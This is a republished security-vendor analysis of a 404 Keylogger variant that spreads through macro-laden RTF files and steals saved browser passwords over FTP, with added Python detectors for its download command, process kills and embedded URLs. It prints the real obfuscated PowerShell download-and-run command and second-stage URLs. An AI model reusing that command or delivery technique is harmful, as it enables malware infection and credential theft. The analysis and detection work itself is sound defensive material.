
How does the latest 404 Keylogger Trojan steal the victim's browser accounts and passwords?

2025-01-26 Update From: SLTechnology News&Howtos > Development


Shulou(Shulou.com)06/02 Report--

This article explains in detail how the latest 404 Keylogger Trojan steals the website accounts and passwords saved in the victim's browser. The editor is sharing it as a reference; after reading it you should have a working understanding of the topic.

Sangfor's security team captured a new variant of the 404 Keylogger Trojan. It spreads through Office documents that carry malicious macro code and steals the website accounts and passwords saved in the victim's browser. The team analysed the sample in detail and recovered the account and password of the attacker's FTP server. Please raise your security awareness and do not casually open email attachments or documents from unknown sources.

The sample is an RTF document with nested OLE objects and malicious macro code, as shown below:

The malicious macro code starts a PowerShell process, downloads the malicious program from a remote server, and then runs it. The command line is shown below. The bit.ly link hides the real download host, and the mixed-case spelling of the cmdlets is obfuscation aimed at simple case-sensitive string matching (PowerShell itself is case-insensitive):

Powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE("http://bit.ly/2P7EoT7", "$ENv:teMp\4235.exe"); stARt "$ENv:tEMP\4235.exe"
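The following detector is an added example written for this page; it is not code from the article or from Sangfor. It shows how to match the macro's download cradle despite the random letter case: every indicator pattern is compiled case-insensitively, whitespace padding is collapsed, and a line is only flagged when it both downloads a payload and launches something, since a bare DownloadString can be legitimate. The indicator list and the two benign command lines are this example's own assumptions; the first sample reproduces the macro's command line from the article.

```python
import re

# Indicator patterns for a PowerShell download-and-execute cradle. The set is
# this example's own choice (not taken from the article); re.I makes every
# pattern case-insensitive, which is what defeats the mixed-case obfuscation.
CRADLE_INDICATORS = {
    "webclient": re.compile(r"new-object\s+(system\.)?net\.webclient", re.I),
    "download":  re.compile(r"\.download(file|string)\s*\(", re.I),
    "temp_drop": re.compile(r"\$env:temp\\", re.I),
    "shortener": re.compile(r"https?://(bit\.ly|tinyurl\.com|t\.co|goo\.gl)/", re.I),
    "launch":    re.compile(r"(^|[;\s|&])(start|start-process|saps|iex|invoke-expression|invoke-item)\b", re.I),
}
URL_RX  = re.compile(r"https?://[^\s\"'(),;]+", re.I)
PATH_RX = re.compile(r"\$env:temp\\[^\s\"';)]+", re.I)


def normalize(cmdline: str) -> str:
    """Collapse whitespace padding. Letter case is deliberately left alone so
    that case-sensitive indicators (bit.ly short codes) survive extraction."""
    return re.sub(r"\s+", " ", cmdline.strip())


def cradle_indicators(cmdline: str) -> list:
    """Names of every indicator that fires on the command line."""
    norm = normalize(cmdline)
    return [name for name, rx in CRADLE_INDICATORS.items() if rx.search(norm)]


def is_download_cradle(cmdline: str) -> bool:
    """True only when the line both fetches a payload and launches something:
    a download on its own may be legitimate software installation."""
    hits = set(cradle_indicators(cmdline))
    return "download" in hits and "launch" in hits


def extract_iocs(cmdline: str) -> dict:
    """Pull the download URL(s) and the drop path(s) out of the command line."""
    norm = normalize(cmdline)
    return {"urls": URL_RX.findall(norm), "paths": PATH_RX.findall(norm)}


# Constructed samples: the first mirrors the macro's command line from the
# article (only the stray space after the backslash, an extraction artifact,
# is removed); the other two are benign admin one-liners made up for contrast.
SAMPLE_CRADLE = (r'Powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE'
                 r'("http://bit.ly/2P7EoT7", "$ENv:teMp\4235.exe"); stARt "$ENv:tEMP\4235.exe"')
BENIGN_LIST  = r"powershell -NoProfile Get-ChildItem $env:temp\ | Measure-Object"
BENIGN_FETCH = r"powershell (New-Object Net.WebClient).DownloadString('https://example.invalid/config.json')"

if __name__ == "__main__":
    for line in (SAMPLE_CRADLE, BENIGN_LIST, BENIGN_FETCH):
        print(is_download_cradle(line), cradle_indicators(line), extract_iocs(line))
```

Feed it the command-line field of process-creation telemetry (for example the CommandLine of a PowerShell process whose parent is WINWORD.EXE or EXCEL.EXE); the parent-process relationship is the strongest single signal for macro-launched cradles and should be checked alongside these string indicators.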

The downloaded program is written in .NET. Analysing it shows that it first obtains the address of a second remote server, hxxps://paste.ee/r/RrkBF, as shown below:

It reads the content hosted at that address, as follows:

It then loads and executes the script fetched from the remote server directly, as follows:

After decrypting and de-obfuscating the script from the remote server, it turns out to be another program written in .NET, as follows:

The main function of this program is keylogging and stealing the accounts and passwords saved for websites in the victim's browser. It first terminates browser-related processes on the victim's host, as follows:

To evade anti-virus software it also terminates the processes of related security products; more than 100 security-software process names are targeted, as shown below:
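A process that terminates several browsers and security tools within seconds is a behaviour worth alerting on regardless of the sample's hash. The sliding-window detector below is an added example for this page, not Sangfor's code; the watchlist of image names is an assumption (the article says the sample kills browsers and over 100 security products but does not publish the list), and the telemetry records are constructed. In practice the "who terminated whom" relation comes from an EDR's process-access telemetry, for example Sysmon Event ID 10 with a GrantedAccess mask that includes 0x1 (PROCESS_TERMINATE); Sysmon's Event ID 5 only records that a process ended.

```python
from collections import defaultdict

# Illustrative watchlist (assumption, not the article's list): browsers whose
# credential stores the stealer wants unlocked, plus tools an analyst or AV
# engine would run. Extend with the products deployed in your environment.
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe", "opera.exe"}
SECURITY_TOOLS = {"msmpeng.exe", "procmon.exe", "wireshark.exe", "procexp.exe", "x64dbg.exe"}
WATCHLIST = BROWSERS | SECURITY_TOOLS


def kill_sprays(events, threshold=3, window_s=60):
    """Return {killer_pid: sorted target names} for every process that
    terminated at least `threshold` distinct watchlisted processes within any
    `window_s`-second window. Each event is a dict with ts (seconds), pid and
    image of the terminating process, and target (image name it terminated)."""
    by_killer = defaultdict(list)
    for ev in events:
        if ev["target"].lower() in WATCHLIST:
            by_killer[ev["pid"]].append(ev)

    findings = {}
    for pid, evs in by_killer.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end, ev in enumerate(evs):
            # Slide the window start forward until it fits within window_s.
            while ev["ts"] - evs[start]["ts"] > window_s:
                start += 1
            targets = {e["target"].lower() for e in evs[start:end + 1]}
            if len(targets) >= threshold:
                findings[pid] = sorted(targets | set(findings.get(pid, [])))
    return findings


def classify(targets):
    """Split a finding's targets into browser kills and security-tool kills,
    which is what tells the responder credential theft from pure AV evasion."""
    return {"browsers": sorted(t for t in targets if t in BROWSERS),
            "security_tools": sorted(t for t in targets if t in SECURITY_TOOLS)}


# Constructed telemetry: the dropped 4235.exe kills three browsers and a
# monitoring tool within one second; explorer.exe closing a browser on the
# user's behalf twice, far apart, must not trigger.
DROPPER = r"C:\Users\victim\AppData\Local\Temp\4235.exe"
SAMPLE_EVENTS = [
    {"ts": 100.0, "pid": 1337, "image": DROPPER, "target": "chrome.exe"},
    {"ts": 100.2, "pid": 1337, "image": DROPPER, "target": "firefox.exe"},
    {"ts": 100.4, "pid": 1337, "image": DROPPER, "target": "MSEdge.exe"},
    {"ts": 101.0, "pid": 1337, "image": DROPPER, "target": "procmon.exe"},
    {"ts": 105.0, "pid": 1337, "image": DROPPER, "target": "notepad.exe"},
    {"ts": 130.0, "pid": 800, "image": r"C:\Windows\explorer.exe", "target": "chrome.exe"},
    {"ts": 900.0, "pid": 800, "image": r"C:\Windows\explorer.exe", "target": "firefox.exe"},
]

if __name__ == "__main__":
    for pid, targets in kill_sprays(SAMPLE_EVENTS).items():
        print(pid, classify(targets))
```

The threshold of three distinct watchlisted targets in a minute is deliberately low: legitimate software rarely terminates even two unrelated browsers, and a sample carrying a list of over 100 security products will exceed it on any host where a few of them are running.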

It records the websites saved in the browser, together with the associated accounts and passwords, and sends them to the attacker's remote FTP server, as follows:

The malicious program also takes screenshots, among other operations. While analysing it, we found the attacker's FTP server address, account and password. Logging in showed that it had already collected host information from a number of victims, as shown below:
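Both the second-stage address recovered from the downloader and the FTP credentials recovered from the final payload are string literals in .NET assemblies, and .NET stores those as UTF-16LE in the #US heap, which is why a plain ASCII strings pass often misses them. The scanner below is an added example written for this page (not Sangfor's tooling): it recovers UTF-16LE string runs the way `strings -el` does, pulls out embedded URLs, and parses any ftp:// URL that carries userinfo into host, port, user and password. The byte blob is constructed for the example; the ftp host and credentials in it are invented, and only the paste.ee address comes from the article.

```python
import re
from urllib.parse import urlsplit

PRINTABLE = range(0x20, 0x7F)  # printable ASCII


def extract_utf16le_strings(blob: bytes, min_len: int = 6) -> list:
    """Recover runs of UTF-16LE ASCII text (`strings -el` style). Scanning at
    every byte offset means no assumption about section alignment is needed."""
    found, i, n = [], 0, len(blob)
    while i + 1 < n:
        j, chars = i, []
        while j + 1 < n and blob[j] in PRINTABLE and blob[j + 1] == 0:
            chars.append(chr(blob[j]))
            j += 2
        if len(chars) >= min_len:
            found.append("".join(chars))
            i = j          # continue after the run just emitted
        else:
            i += 1         # no run here, try the next byte offset
    return found


URL_RX = re.compile(r"(?:ftps?|https?)://[^\s\"'<>]+")


def find_embedded_urls(blob: bytes) -> list:
    """Every http(s)/ftp(s) URL found inside the recovered strings."""
    return [m.group(0)
            for s in extract_utf16le_strings(blob)
            for m in URL_RX.finditer(s)]


def find_ftp_credentials(blob: bytes) -> list:
    """FTP URLs that embed credentials, split into the fields a responder
    needs for blocking and for notifying the hosting provider."""
    creds = []
    for url in find_embedded_urls(blob):
        parts = urlsplit(url)
        if parts.scheme in ("ftp", "ftps") and parts.username:
            creds.append({"host": parts.hostname, "port": parts.port or 21,
                          "user": parts.username, "password": parts.password,
                          "url": url})
    return creds


# Constructed stand-in for a managed binary: header-like noise, two UTF-16LE
# string literals (one of them an ftp URL with invented credentials), a plain
# ASCII string that must NOT be picked up, and a short file name.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + bytes(range(0x20))
    + "https://paste.ee/r/RrkBF".encode("utf-16-le") + b"\x00\x00"
    + b"\x07\x0b\xff\xfe"
    + "ftp://collector:Pa55w0rd@ftp.example.invalid:2121/logs/".encode("utf-16-le") + b"\x00\x00"
    + b"plain ascii\x00\x00"
    + "KeyLog.txt".encode("utf-16-le")
)

if __name__ == "__main__":
    print(extract_utf16le_strings(SAMPLE_BLOB))
    print(find_ftp_credentials(SAMPLE_BLOB))
```

Run it over the dropped executable and the decoded second stage; when the credential strings are not visible because the sample builds them at runtime, the same parsing applies to the USER and PASS lines of the FTP control channel, which FTP sends in cleartext, so a packet capture of the exfiltration exposes them just as readily.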

Solution: virus detection and removal

1. Sangfor security products such as EDR, the next-generation firewall and the security awareness platform all have virus detection capabilities; users who have deployed these products can run a virus scan, as shown in the figure:

2. Sangfor also provides free scanning and removal tools; download the tool matching your system and run a scan.

64-bit system download link:

http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z

32-bit system download link:

http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z

Virus prevention

1. Patch the operating system and upgrade applications promptly to close known vulnerabilities.

2. Do not open email attachments from unknown sources or download software from unknown websites.

3. Sangfor firewall customers are advised to upgrade to version AF805 and enable the SAVE artificial intelligence engine for the best defensive effect.

That concludes how the latest 404 Keylogger Trojan steals the victim's browser website accounts and passwords. I hope the above content has been of some help. If you found the article useful, please share it so that more people can see it.
